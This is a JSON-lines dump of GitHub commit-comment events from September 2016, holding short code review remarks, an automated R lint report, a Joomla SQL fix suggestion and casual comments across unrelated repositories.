{"id":"4561618021","type":"CommitCommentEvent","actor":{"login":"muaddibus"},"repo":{"name":"muaddibus/ingress-intel-total-conversion"},"payload":{"comment":{"id":19017900,"position":null,"line":null,"path":null,"commit_id":"10ea62fa6af4a96261d5b07e4eb326d089e96d03","created_at":"2016-09-14T12:26:00Z","updated_at":"2016-09-14T12:26:00Z","body":"TODO:\n\nPlan: Creation,Deletion;\nPortal: Removing;\n\nCSV generation, Script generation, ZIP creation\nHTTP GET to url\nResults?"}},"created_at":"2016-09-14T12:26:00Z"}
{"id":"4561618568","type":"CommitCommentEvent","actor":{"login":"Solaris555"},"repo":{"name":"Solaris555/homepage"},"payload":{"comment":{"id":19017902,"position":null,"line":null,"path":null,"commit_id":"bb67df84c9d1e5e462b0a16b41f34e3e6fc003bc","created_at":"2016-09-14T12:26:09Z","updated_at":"2016-09-14T12:26:09Z","body":"Haste toll gemacht\r\n"}},"created_at":"2016-09-14T12:26:09Z"}
{"id":"4561620942","type":"CommitCommentEvent","actor":{"login":"cordmaehlmann"},"repo":{"name":"cordmaehlmann/test2016"},"payload":{"comment":{"id":19017906,"position":null,"line":null,"path":null,"commit_id":"00894fdd7a1f6d025c963fdd6c5f1016e217879b","created_at":"2016-09-14T12:26:36Z","updated_at":"2016-09-14T12:26:36Z","body":"Super gemacht!"}},"created_at":"2016-09-14T12:26:36Z"}
{"id":"4561621153","type":"CommitCommentEvent","actor":{"login":"pascalbetz"},"repo":{"name":"SumOfUs/Champaign"},"payload":{"comment":{"id":19017908,"position":10,"line":10,"path":"app/services/auth_token_verifier.rb","commit_id":"53496a08eeee7bf5868edefd9f70ea4e17b0e411","created_at":"2016-09-14T12:26:39Z","updated_at":"2016-09-14T12:26:39Z","body":"Why not continue with early returns style that you have on the beginning of the method?\r\n\r\ndef verify\r\n  return @errors if @errors.any?\r\n  return if valid_token?\r\n  Rails.logger.error(\"Token verification....\")\r\n  [\"Your confirmation token appears to be invalid....\"]\r\nend"}},"created_at":"2016-09-14T12:26:39Z"}
{"id":"4561632810","type":"CommitCommentEvent","actor":{"login":"dermesser"},"repo":{"name":"Byron/yup-oauth2"},"payload":{"comment":{"id":19017932,"position":null,"line":null,"path":null,"commit_id":"cd2b1d56a9eb88aa05b22075affd2e4faeb55153","created_at":"2016-09-14T12:29:13Z","updated_at":"2016-09-14T12:29:13Z","body":"LGTM, thanks!"}},"created_at":"2016-09-14T12:29:13Z"}
{"id":"4561634002","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19017933,"position":null,"line":null,"path":null,"commit_id":"97d178f4decee090a32cba1f57b91cc0f53debfe","created_at":"2016-09-14T12:29:28Z","updated_at":"2016-09-14T12:29:28Z","body":"[tests/testthat/test_mcmc_nltt.R:7:51:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Trailing whitespace is superfluous.**\n```r\n​  tree1 <- TESS::tess.sim.taxa(n = 1, nTaxa = 100, \n                                                  ^\n```\n[tests/testthat/test_mcmc_nltt.R:9:51:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L9) *style:* **Trailing whitespace is superfluous.**\n```r\n​  tree2 <- TESS::tess.sim.taxa(n = 1, nTaxa = 100, \n                                                  ^\n```\n[tests/testthat/test_mcmc_nltt.R:13:60:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L13) *style:* **Trailing whitespace is superfluous.**\n```r\n​    lnl <- TESS::tess.likelihood(ape::branching.times(phy), \n                                                           ^\n```\n[tests/testthat/test_mcmc_nltt.R:21:1:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:23:1:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_error(\n^\n```\n[tests/testthat/test_mcmc_nltt.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:27:59:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L27) *style:* **Commas should always have a space after.**\n```r\n​    colMeans( mcmc_nltt( tree1, LL_BD, c(1, 0.01), c(TRUE,TRUE), \n                                                          ^\n```\n[tests/testthat/test_mcmc_nltt.R:27:65:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L27) *style:* **Trailing whitespace is superfluous.**\n```r\n​    colMeans( mcmc_nltt( tree1, LL_BD, c(1, 0.01), c(TRUE,TRUE), \n                                                                ^\n```\n[tests/testthat/test_mcmc_nltt.R:29:1:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_error(\n^\n```\n[tests/testthat/test_mcmc_nltt.R:30:1:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  mcmc_nltt( p, LL_BD,c(1, -1), c(TRUE, TRUE), \n^\n```\n[tests/testthat/test_mcmc_nltt.R:31:1:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t             iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n^\n```\n[tests/testthat/test_mcmc_nltt.R:32:1:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  \"mcmc_nltt: initial parameter values have to be above zero\"\n^\n```\n[tests/testthat/test_mcmc_nltt.R:34:44:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L34) *style:* **Commas should always have a space after.**\n```r\n​    colMeans( mcmc_nltt( tree2, LL_BD, c(1,0.01), c(TRUE,TRUE),\n                                           ^\n```\n[tests/testthat/test_mcmc_nltt.R:34:58:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L34) *style:* **Commas should always have a space after.**\n```r\n​    colMeans( mcmc_nltt( tree2, LL_BD, c(1,0.01), c(TRUE,TRUE),\n                                                         ^\n```\n[tests/testthat/test_mcmc_nltt.R:40:1:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L40) *style:* **lines should not be more than 80 characters.**\n```r\n​  expect_equal( #compare jumps in log space with jumps in normal space, should yield similar results\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:41:1:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L41) *style:* **lines should not be more than 80 characters.**\n```r\n​    colMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(TRUE,TRUE), iterations = 10000, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:41:13:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L41) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    colMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(FALSE,FALSE), iterations = 10000, \n            ^\n```\n[tests/testthat/test_mcmc_nltt.R:41:24:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L41) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    colMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(FALSE,FALSE), iterations = 10000, \n                       ^\n```\n[tests/testthat/test_mcmc_nltt.R:41:55:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L41) *style:* **Commas should always have a space after.**\n```r\n​    colMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(TRUE,TRUE), iterations = 10000, \n                                                      ^\n```\n[tests/testthat/test_mcmc_nltt.R:41:81:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L41) *style:* **Trailing whitespace is superfluous.**\n```r\n​    colMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(TRUE,TRUE), iterations = 10000, \n                                                                                ^\n```\n[tests/testthat/test_mcmc_nltt.R:43:1:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n​    colMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(FALSE,FALSE), iterations = 10000, \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:43:56:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L43) *style:* **Commas should always have a space after.**\n```r\n​    colMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(FALSE,FALSE), iterations = 10000, \n                                                       ^\n```\n[tests/testthat/test_mcmc_nltt.R:43:83:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L43) *style:* **Trailing whitespace is superfluous.**\n```r\n​    colMeans( mcmc_nltt( q, LL_BD, c(1, 0.01), c(FALSE,FALSE), iterations = 10000, \n                                                                                  ^\n```\n[tests/testthat/test_mcmc_nltt.R:52:46:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L52) *style:* **Trailing whitespace is superfluous.**\n```r\n​  p <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, \n                                             ^\n```\n[tests/testthat/test_mcmc_nltt.R:54:46:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L54) *style:* **Trailing whitespace is superfluous.**\n```r\n​  q <- TESS::tess.sim.taxa(n = 1, nTaxa = 50, \n                                             ^\n```\n[tests/testthat/test_mcmc_nltt.R:66:44:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L66) *style:* **Commas should always have a space after.**\n```r\n​    mcmc_nltt( q, LL_BD, c(1, 0.0), c(TRUE,TRUE),\n                                           ^\n```\n[tests/testthat/test_mcmc_nltt.R:72:53:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​    mcmc_nltt( 42, LL_BD, c(1, 0.01), c(TRUE, TRUE), \n                                                    ^\n```\n[tests/testthat/test_mcmc_nltt.R:78:24:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L78) *style:* **Commas should always have a space after.**\n```r\n​\t  mcmc_nltt( p, LL_BD,c(1, -1), c(TRUE, TRUE), \n                       ^\n```\n[tests/testthat/test_mcmc_nltt.R:78:48:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L78) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t  mcmc_nltt( p, LL_BD,c(1, -1), c(TRUE, TRUE), \n                                               ^\n```\n[tests/testthat/test_mcmc_nltt.R:79:33:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t             iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                               ~^\n```\n[tests/testthat/test_mcmc_nltt.R:79:49:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t             iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                                               ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:79:66:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t             iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                                                                ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:79:77:](https://github.com/richelbilderbeek/nLTT/blob/97d178f4decee090a32cba1f57b91cc0f53debfe/tests/testthat/test_mcmc_nltt.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t             iterations = 10000, burnin = 1000, thinning = 1, sigma = 0.5),\n                                                                           ~^~\n```"}},"created_at":"2016-09-14T12:29:28Z"}
{"id":"4561635266","type":"CommitCommentEvent","actor":{"login":"sweetwills"},"repo":{"name":"DavidCPhillips/spfjs"},"payload":{"comment":{"id":19017940,"position":4,"line":21,"path":"src/client/nav/nav.js","commit_id":"1a8145ac9d4692fec7ce416b79279818030b6eba","created_at":"2016-09-14T12:29:45Z","updated_at":"2016-09-14T12:29:45Z","body":"this is really awsome i would like to get some help from u please"}},"created_at":"2016-09-14T12:29:45Z"}
{"id":"4561639674","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19017956,"position":28,"line":0,"path":"js/js.translator/testData/_commonFiles/asserts.kt","commit_id":"c6f2ca04dc2d13984acaa40dc4a6ae90c09e6b83","created_at":"2016-09-14T12:30:40Z","updated_at":"2016-09-14T12:30:40Z","body":"Did you mean `Array<out T>`?"}},"created_at":"2016-09-14T12:30:40Z"}
{"id":"4561641066","type":"CommitCommentEvent","actor":{"login":"waldyrious"},"repo":{"name":"TeamOfOne/psc16-team33"},"payload":{"comment":{"id":19017961,"position":null,"line":null,"path":null,"commit_id":"75fd512886623517a1b05dfb0fb9072ed0d5d9c7","created_at":"2016-09-14T12:30:57Z","updated_at":"2016-09-14T12:30:57Z","body":"@fjsnogueira please don't commit directly to master."}},"created_at":"2016-09-14T12:30:57Z"}
{"id":"4561642545","type":"CommitCommentEvent","actor":{"login":"JacksonCunha29"},"repo":{"name":"JacksonCunha29/Hello-World"},"payload":{"comment":{"id":19017967,"position":1,"line":1,"path":".gitignore","commit_id":"63542ea8d342994d687e6826bec9763d51323a6a","created_at":"2016-09-14T12:31:18Z","updated_at":"2016-09-14T12:31:18Z","body":"public class HelloWorld{\r\n\r\n}"}},"created_at":"2016-09-14T12:31:18Z"}
{"id":"4561642618","type":"CommitCommentEvent","actor":{"login":"tde-banana-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19017968,"position":null,"line":null,"path":null,"commit_id":"003908e4fe500cba560e1c7bdf47e072fbd2549d","created_at":"2016-09-14T12:31:19Z","updated_at":"2016-09-14T12:31:19Z","body":":postal_horn: "}},"created_at":"2016-09-14T12:31:19Z"}
{"id":"4561644581","type":"CommitCommentEvent","actor":{"login":"attuska"},"repo":{"name":"uhulinux/uhu-installer-ubk"},"payload":{"comment":{"id":19017971,"position":null,"line":null,"path":null,"commit_id":"fde8b886d414a117f6cd6c0c953b4821c35ca20f","created_at":"2016-09-14T12:31:45Z","updated_at":"2016-09-14T12:31:45Z","body":"Az **sgdisk --zap-all** az esetleg létező partíciós táblát is törli, partíciós tábla híján nem lehet partíciót csinálni."}},"created_at":"2016-09-14T12:31:45Z"}
{"id":"4561646185","type":"CommitCommentEvent","actor":{"login":"uyinn"},"repo":{"name":"7sDream/rikka"},"payload":{"comment":{"id":19017976,"position":null,"line":null,"path":null,"commit_id":"fcaa7a126b87c1ec969788239564420f3f0a2faf","created_at":"2016-09-14T12:32:06Z","updated_at":"2016-09-14T12:32:06Z","body":"daocloud.io上面的镜像 023和024的TAG顺序反了，直接抓最新版的话，是023"}},"created_at":"2016-09-14T12:32:06Z"}
{"id":"4561648657","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19017989,"position":59,"line":77,"path":"band-web/src/main/java/hu/schonherz/training/band/managedbeans/request/PublicBandProfileMB.java","commit_id":"14fcc29f9952a99ed0da26c883cb5e30a07cdfbf","created_at":"2016-09-14T12:32:37Z","updated_at":"2016-09-14T12:32:37Z","body":"There should not be getters and setters for dependency members."}},"created_at":"2016-09-14T12:32:37Z"}
{"id":"4561654211","type":"CommitCommentEvent","actor":{"login":"usedBullet"},"repo":{"name":"usedBullet/mygame"},"payload":{"comment":{"id":19018009,"position":3,"line":3,"path":"test1","commit_id":"114c769ff9158214aa7294be8fab54414cb2dca0","created_at":"2016-09-14T12:33:50Z","updated_at":"2016-09-14T12:33:50Z","body":"heihei"}},"created_at":"2016-09-14T12:33:50Z"}
{"id":"4561654839","type":"CommitCommentEvent","actor":{"login":"hypersw"},"repo":{"name":"Maximus5/conemu-inside"},"payload":{"comment":{"id":19018010,"position":null,"line":null,"path":null,"commit_id":"857eb7c45f0ded41eab214faa36d13fe7c9960d2","created_at":"2016-09-14T12:33:58Z","updated_at":"2016-09-14T12:33:58Z","body":"Possible.\r\nThis is not 100% correct because the escaping is not formally required, the target process receives the command line string AS IS and can parse it at its own discretion with any escaping rules it likes. Actually, escaping rules do vary from app to app, and the `CommandLineBuilder` implements some average sane rules.\r\nBut it allows to submit unescaped raw text if needed, so would do for all uses."}},"created_at":"2016-09-14T12:33:58Z"}
{"id":"4561656085","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ananya-bhattacharya/hydrator-plugins"},"payload":{"comment":{"id":19018014,"position":null,"line":null,"path":null,"commit_id":"6d9142cd130a2130b77c0c71fceeec93771e8dc2","created_at":"2016-09-14T12:34:14Z","updated_at":"2016-09-14T12:34:14Z","body":"Updated code with review comments.\r\nPlease review again. Thanks!"}},"created_at":"2016-09-14T12:34:14Z"}
{"id":"4561656673","type":"CommitCommentEvent","actor":{"login":"JacksonCunha29"},"repo":{"name":"JacksonCunha29/Hello-World"},"payload":{"comment":{"id":19018015,"position":2,"line":2,"path":".gitignore","commit_id":"63542ea8d342994d687e6826bec9763d51323a6a","created_at":"2016-09-14T12:34:21Z","updated_at":"2016-09-14T12:34:21Z","body":"public class HelloWorld{\r\n\r\n}"}},"created_at":"2016-09-14T12:34:21Z"}
{"id":"4561661052","type":"CommitCommentEvent","actor":{"login":"sonsory"},"repo":{"name":"sonsory/bcode"},"payload":{"comment":{"id":19018024,"position":10,"line":273,"path":"public/stylesheets/master.css","commit_id":"b02dc944bf2f77020cb6b1ec6efaa3dee3c1cc5e","created_at":"2016-09-14T12:35:17Z","updated_at":"2016-09-14T12:35:17Z","body":"dsfsdfs"}},"created_at":"2016-09-14T12:35:17Z"}
{"id":"4561662641","type":"CommitCommentEvent","actor":{"login":"xxFlare"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19018027,"position":null,"line":null,"path":null,"commit_id":"ce6a0b4d0bdb378ac693d39f4be1a9d454518825","created_at":"2016-09-14T12:35:35Z","updated_at":"2016-09-14T12:35:35Z","body":"@dktapps I love how most of your code always ends up on ClearSky."}},"created_at":"2016-09-14T12:35:35Z"}
{"id":"4561664490","type":"CommitCommentEvent","actor":{"login":"ale-git"},"repo":{"name":"robotology/icub-main"},"payload":{"comment":{"id":19018030,"position":null,"line":null,"path":null,"commit_id":"3b0616ca6b81591c5414bfeda7c43d3adc92ed5d","created_at":"2016-09-14T12:35:59Z","updated_at":"2016-09-14T12:35:59Z","body":"Hi @paulfitz I think there some autocomplete mismatch at line 948: shouldn't it be **m_pFrame->timestamp** instead of **m_pFrame->image**?"}},"created_at":"2016-09-14T12:35:59Z"}
{"id":"4561672723","type":"CommitCommentEvent","actor":{"login":"jbkempf"},"repo":{"name":"videolan/vlc"},"payload":{"comment":{"id":19018045,"position":null,"line":null,"path":null,"commit_id":"c220ddc927d1a97f72a0c5bf86de56301e3483ad","created_at":"2016-09-14T12:37:43Z","updated_at":"2016-09-14T12:37:43Z","body":"Sorry, but there is no simple way to make that in VLC, and not libvlccore.\r\n\r\nBecause VLC (and axvlc) is linking to libvlc and libvlccore and should be loaded automatically, but the VLC plugins should be explicitly loaded, but any library loaded by those plugins should only be loaded from the specified locations (SYS32) or explicitely.\r\n\r\nI'll welcome any better patch that provide the same level of security."}},"created_at":"2016-09-14T12:37:43Z"}
{"id":"4561675192","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19018054,"position":13,"line":622,"path":"installer/sql/create-mssql.sql","commit_id":"dac69553e3fc50dce0811ccc10fd82e1363e8677","created_at":"2016-09-14T12:38:16Z","updated_at":"2016-09-14T12:38:16Z","body":"Replace [key] with stg_name here."}},"created_at":"2016-09-14T12:38:16Z"}
{"id":"4561676724","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19018061,"position":13,"line":631,"path":"installer/sql/create-pgsql.sql","commit_id":"dac69553e3fc50dce0811ccc10fd82e1363e8677","created_at":"2016-09-14T12:38:35Z","updated_at":"2016-09-14T12:38:35Z","body":"...and here."}},"created_at":"2016-09-14T12:38:35Z"}
{"id":"4561682471","type":"CommitCommentEvent","actor":{"login":"ColinM2"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":19018079,"position":null,"line":null,"path":null,"commit_id":"bef41c9a73463b0c7374ff2a30a2bb6a1093e9bf","created_at":"2016-09-14T12:39:45Z","updated_at":"2016-09-14T12:39:45Z","body":"The objective of the patch is to the prevent the display of tagged items that are in unpublished categories. However the patch is incomplete and it is creating serious problems for several components that use tags in Components where items that are not assigned to a category, or items from components that allow multiple categories. This is affecting components such as jDownloads and HWDMediaShare that make use of tags.\r\n\r\nHWDMediaShare have found a solution see \r\nhttps://hwdmediashare.co.uk/blog/769-joomla-3-6-0-undesirable-change-affecting-joomla-tags-in-hwdmediashare\r\n\r\nby changing lines 572 and 573 in libraries/cms/helper/tags.php lines from\r\n```\r\n// Join over categoris for get only published \r\n->join('INNER', '#__categories AS tc ON tc.id = c.core_catid AND tc.published = 1')\r\n```\r\nto\r\n```\r\n// Join over categories to only get items in published categories, or items in no category  \r\n->join('LEFT', '#__categories AS tc ON tc.id = c.core_catid')->where('(tc.published = 1 OR tc.published IS NULL)')\r\n```\r\nColinM"}},"created_at":"2016-09-14T12:39:45Z"}
{"id":"4561686646","type":"CommitCommentEvent","actor":{"login":"abellotti"},"repo":{"name":"matobet/manageiq"},"payload":{"comment":{"id":19018087,"position":5,"line":8,"path":"lib/extensions/ar_region.rb","commit_id":"0401c16fef5d1ba5f8b5aa5ae432834b1322140b","created_at":"2016-09-14T12:40:38Z","updated_at":"2016-09-14T12:40:38Z","body":"@matobet Simon's fixes were merged in. Can you rebase with latest and try again ?  Thanks.\r\n\r\n/cc @isimluk "}},"created_at":"2016-09-14T12:40:38Z"}
{"id":"4561692330","type":"CommitCommentEvent","actor":{"login":"zero-24"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":19018092,"position":null,"line":null,"path":null,"commit_id":"bef41c9a73463b0c7374ff2a30a2bb6a1093e9bf","created_at":"2016-09-14T12:41:47Z","updated_at":"2016-09-14T12:41:47Z","body":"@ColinM2 please open a new issue / pull request with your chnages, else it get lost. Thanks."}},"created_at":"2016-09-14T12:41:47Z"}
{"id":"4561693773","type":"CommitCommentEvent","actor":{"login":"p0xD"},"repo":{"name":"p0xD/Arthon"},"payload":{"comment":{"id":19018095,"position":null,"line":null,"path":null,"commit_id":"93ace3fec21003def1e77bdec7c2ab8d3b1ec77f","created_at":"2016-09-14T12:42:06Z","updated_at":"2016-09-14T12:42:06Z","body":"lol"}},"created_at":"2016-09-14T12:42:06Z"}
{"id":"4561694413","type":"CommitCommentEvent","actor":{"login":"mbabker"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":19018099,"position":null,"line":null,"path":null,"commit_id":"bef41c9a73463b0c7374ff2a30a2bb6a1093e9bf","created_at":"2016-09-14T12:42:14Z","updated_at":"2016-09-14T12:42:14Z","body":"Published should never have a null value.  If some extension is setting that in the categories table, they are causing an invalid data set."}},"created_at":"2016-09-14T12:42:14Z"}
{"id":"4561696817","type":"CommitCommentEvent","actor":{"login":"osfans"},"repo":{"name":"rime/librime"},"payload":{"comment":{"id":19018104,"position":null,"line":null,"path":null,"commit_id":"5c5b87c18680b3dd45c9efa1196ea4b4cdefd910","created_at":"2016-09-14T12:42:43Z","updated_at":"2016-09-14T12:42:43Z","body":"@lotem translator好像只能拿到輸入編碼。有辦法拿到候選漢字反查內碼顯示爲comment嗎？"}},"created_at":"2016-09-14T12:42:43Z"}
{"id":"4561697195","type":"CommitCommentEvent","actor":{"login":"ishmaelt3"},"repo":{"name":"wallon-ines/redmine_shib_auth"},"payload":{"comment":{"id":19018105,"position":null,"line":null,"path":null,"commit_id":"32d23cec170c34e737577c5a2862ff0f55130637","created_at":"2016-09-14T12:42:48Z","updated_at":"2016-09-14T12:42:48Z","body":"I have an issue with my redmine, I login session expired immediately and I am redirected...\r\n\r\nwhat could be causing this?\r\n\r\n![image](https://cloud.githubusercontent.com/assets/22149023/18512446/79c50aca-7a89-11e6-8df8-aa9bc161c129.png)\r\n\r\n\r\nApp 2812 stderr:   Current user: anonymous\r\nApp 2812 stderr: Filter chain halted as :user_setup rendered or redirected\r\nApp 2812 stderr: Completed 302 Found in 17ms (ActiveRecord: 3.8ms)\r\nApp 2812 stderr: Started GET \"/\" for 146.xx.xx.xx at 2016-09-14 14:37:38 +0200\r\nApp 2812 stderr: Processing by WelcomeController#index as HTML\r\nApp 2812 stderr: Redirected to https://redmine.co.za/httpauth-login?back_url=https%3A%2F%2Fredmine.co.za%2F\r\nApp 2812 stderr: Filter chain halted as :session_expiration rendered or redirected\r\nApp 2812 stderr: Completed 302 Found in 5ms (ActiveRecord: 0.4ms)\r\nApp 2812 stderr: Started GET \"/\" for xx.xx.xx.xx at 2016-09-14 14:37:43 +0200\r\nApp 2812 stderr: Processing by WelcomeController#index as HTML\r\nApp 2812 stderr:   Current user: anonymous\r\nApp 2812 stderr:   Rendered welcome/index.html.erb within layouts/base (1.8ms)\r\nApp 2812 stderr: Completed 200 OK in 28ms (Views: 14.2ms | ActiveRecord: 1.8ms)"}},"created_at":"2016-09-14T12:42:48Z"}
{"id":"4561697681","type":"CommitCommentEvent","actor":{"login":"fps01"},"repo":{"name":"DevGroup-ru/dotplant-store"},"payload":{"comment":{"id":19018108,"position":140,"line":144,"path":"src/helpers/ExtendedPriceHelper.php","commit_id":"1fb9447025301c9cc19d686fc8c37a863eb98b02","created_at":"2016-09-14T12:42:55Z","updated_at":"2016-09-14T12:42:55Z","body":"I suggest to use a `private $classMap` instead of `if` construction"}},"created_at":"2016-09-14T12:42:55Z"}
{"id":"4561701325","type":"CommitCommentEvent","actor":{"login":"Bauuuuu"},"repo":{"name":"Bauuuuu/android_kernel_zte_nx512j"},"payload":{"comment":{"id":19018115,"position":null,"line":null,"path":null,"commit_id":"3f31956c7bccb9c7989fd2b9c97fe56d0b59d2cf","created_at":"2016-09-14T12:43:37Z","updated_at":"2016-09-14T12:43:37Z","body":"i am not sure about it"}},"created_at":"2016-09-14T12:43:37Z"}
